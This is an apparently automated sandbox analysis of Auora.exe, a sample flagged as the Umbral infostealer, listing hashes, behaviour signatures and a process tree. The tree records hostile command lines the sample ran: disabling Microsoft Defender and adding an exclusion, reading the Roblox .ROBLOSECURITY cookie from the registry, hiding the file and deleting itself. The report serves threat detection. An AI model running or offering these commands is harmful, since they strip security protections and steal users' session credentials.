Analysis
-
max time kernel
24s -
max time network
11s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-04-2024 17:18
Behavioral task
behavioral1
Sample
Auora.exe
Resource
win10-20240404-en
General
-
Target
Auora.exe
-
Size
231KB
-
MD5
a96e98be73b7840e10e039d7b3b2a72a
-
SHA1
bde4c46b9a32ba14aafe652ebe14cb03ba2692a8
-
SHA256
886a78f6d4a3bb1667c7d8ba553487a9d42fc38188253d3604cfe5c0743b636b
-
SHA512
c4855010f4b9bf3c0d3f2b78447380d0f85ed440355ed0ed39f10727b44d555f1a7b9ae3a6d241f313d85fa8f052692c20149ecb5b4f6b841291a3f12651ced7
-
SSDEEP
6144:xloZM+rIkd8g+EtXHkv/iD4yr5ClW8e1mzi:DoZtL+EP8VCv
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/2396-0-0x000002C5B9D40000-0x000002C5B9D80000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Auora.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 5 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3708 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1360 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2396 Auora.exe 2044 powershell.exe 2044 powershell.exe 2304 powershell.exe 2304 powershell.exe 1132 powershell.exe 1132 powershell.exe 560 powershell.exe 560 powershell.exe 3884 powershell.exe 3884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2396 Auora.exe Token: SeIncreaseQuotaPrivilege 1600 wmic.exe Token: SeSecurityPrivilege 1600 wmic.exe Token: SeTakeOwnershipPrivilege 1600 wmic.exe Token: SeLoadDriverPrivilege 1600 wmic.exe Token: SeSystemProfilePrivilege 1600 wmic.exe Token: SeSystemtimePrivilege 1600 wmic.exe Token: SeProfSingleProcessPrivilege 1600 wmic.exe Token: SeIncBasePriorityPrivilege 1600 wmic.exe Token: SeCreatePagefilePrivilege 1600 wmic.exe Token: SeBackupPrivilege 1600 wmic.exe Token: SeRestorePrivilege 1600 wmic.exe Token: SeShutdownPrivilege 1600 wmic.exe Token: SeDebugPrivilege 1600 wmic.exe Token: SeSystemEnvironmentPrivilege 1600 wmic.exe Token: SeRemoteShutdownPrivilege 1600 wmic.exe Token: SeUndockPrivilege 1600 wmic.exe Token: SeManageVolumePrivilege 1600 wmic.exe Token: 33 1600 wmic.exe Token: 34 1600 wmic.exe Token: 35 1600 wmic.exe Token: 36 1600 wmic.exe Token: SeIncreaseQuotaPrivilege 1600 wmic.exe Token: SeSecurityPrivilege 1600 wmic.exe Token: SeTakeOwnershipPrivilege 1600 wmic.exe Token: SeLoadDriverPrivilege 1600 wmic.exe Token: SeSystemProfilePrivilege 1600 wmic.exe Token: SeSystemtimePrivilege 1600 wmic.exe Token: SeProfSingleProcessPrivilege 1600 wmic.exe Token: SeIncBasePriorityPrivilege 1600 wmic.exe Token: SeCreatePagefilePrivilege 1600 wmic.exe Token: SeBackupPrivilege 1600 wmic.exe Token: SeRestorePrivilege 1600 wmic.exe Token: SeShutdownPrivilege 1600 wmic.exe Token: SeDebugPrivilege 1600 wmic.exe Token: SeSystemEnvironmentPrivilege 1600 wmic.exe Token: SeRemoteShutdownPrivilege 1600 wmic.exe Token: SeUndockPrivilege 1600 wmic.exe Token: SeManageVolumePrivilege 1600 wmic.exe Token: 33 1600 wmic.exe Token: 34 1600 wmic.exe Token: 35 1600 wmic.exe Token: 36 1600 wmic.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeIncreaseQuotaPrivilege 2688 wmic.exe Token: SeSecurityPrivilege 2688 wmic.exe Token: SeTakeOwnershipPrivilege 2688 wmic.exe Token: SeLoadDriverPrivilege 2688 wmic.exe Token: SeSystemProfilePrivilege 2688 wmic.exe Token: SeSystemtimePrivilege 2688 wmic.exe Token: SeProfSingleProcessPrivilege 2688 wmic.exe Token: SeIncBasePriorityPrivilege 2688 wmic.exe Token: SeCreatePagefilePrivilege 2688 wmic.exe Token: SeBackupPrivilege 2688 wmic.exe Token: SeRestorePrivilege 2688 wmic.exe Token: SeShutdownPrivilege 2688 wmic.exe Token: SeDebugPrivilege 2688 wmic.exe Token: SeSystemEnvironmentPrivilege 2688 wmic.exe Token: SeRemoteShutdownPrivilege 2688 wmic.exe Token: SeUndockPrivilege 2688 wmic.exe Token: SeManageVolumePrivilege 2688 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 2396 wrote to memory of 1600 2396 Auora.exe 81 PID 2396 wrote to memory of 1600 2396 Auora.exe 81 PID 2396 wrote to memory of 3288 2396 Auora.exe 84 PID 2396 wrote to memory of 3288 2396 Auora.exe 84 PID 2396 wrote to memory of 2044 2396 Auora.exe 86 PID 2396 wrote to memory of 2044 2396 Auora.exe 86 PID 2396 wrote to memory of 2304 2396 Auora.exe 88 PID 2396 wrote to memory of 2304 2396 Auora.exe 88 PID 2396 wrote to memory of 1132 2396 Auora.exe 90 PID 2396 wrote to memory of 1132 2396 Auora.exe 90 PID 2396 wrote to memory of 560 2396 Auora.exe 92 PID 2396 wrote to memory of 560 2396 Auora.exe 92 PID 2396 wrote to memory of 2688 2396 Auora.exe 94 PID 2396 wrote to memory of 2688 2396 Auora.exe 94 PID 2396 wrote to memory of 1472 2396 Auora.exe 96 PID 2396 wrote to memory of 1472 2396 Auora.exe 96 PID 2396 wrote to memory of 4004 2396 Auora.exe 98 PID 2396 wrote to memory of 4004 2396 Auora.exe 98 PID 2396 wrote to memory of 3884 2396 Auora.exe 100 PID 2396 wrote to memory of 3884 2396 Auora.exe 100 PID 2396 wrote to memory of 3708 2396 Auora.exe 102 PID 2396 wrote to memory of 3708 2396 Auora.exe 102 PID 2396 wrote to memory of 3524 2396 Auora.exe 104 PID 2396 wrote to memory of 3524 2396 Auora.exe 104 PID 3524 wrote to memory of 1360 3524 cmd.exe 106 PID 3524 wrote to memory of 1360 3524 cmd.exe 106 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3288 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Auora.exe"C:\Users\Admin\AppData\Local\Temp\Auora.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Auora.exe"2⤵
- Views/modifies file attributes
PID:3288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Auora.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1472
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:4004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3884
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3708
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Auora.exe" && pause2⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:1360
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3900
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
Filesize
948B
MD545741c307af2576c6437c5fdb24ef9ce
SHA1a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf
SHA2567887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2
SHA51239fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941
-
Filesize
1KB
MD57332074ae2b01262736b6fbd9e100dac
SHA122f992165065107cc9417fa4117240d84414a13c
SHA256baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA5124ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
Filesize
1KB
MD500b5dac0faabd946e46411c68c4e4b54
SHA1ebffe4f7312c6a3ea1a5bfb8e36e3716b73a71de
SHA256ba0bccd5b683d96eda6d4000424147e0dddaa1e6c87dd65566721f4552397133
SHA51225a291425f8ac169440d5a6250b2eae67261d599bd35aa3e02c742deed5aedea7d4e88910947116068759e3b8cb5fd82c29b6360d86b663fc536b09bd69ac9c0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82